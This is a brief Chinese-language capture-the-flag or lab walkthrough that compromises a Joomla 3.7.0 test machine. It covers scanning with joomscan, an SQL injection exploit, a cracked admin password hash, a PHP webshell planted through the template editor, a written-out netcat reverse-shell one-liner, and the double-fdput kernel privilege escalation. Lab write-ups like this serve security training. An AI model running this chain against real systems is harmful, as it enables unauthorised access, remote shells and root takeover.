joomscan -u http://192.168.56.102 得到joomla版本3.7.0，存在注入漏洞
https://github.com/XiphosResearch/exploits/blob/master/Joomblah/joomblah.py
得到admin的口令$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu，破解得到snoopy
于是登录后台，在Extensions->Templates的html文件夹下创建webshell，然后反弹shell
<?php system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 7744 >/tmp/f’); ?>
利用ubuntu 16.04的提权漏洞double-fdput，把提权代码39772.zip传到靶机/tmp下，然后提权
./compile.sh
./doubleput
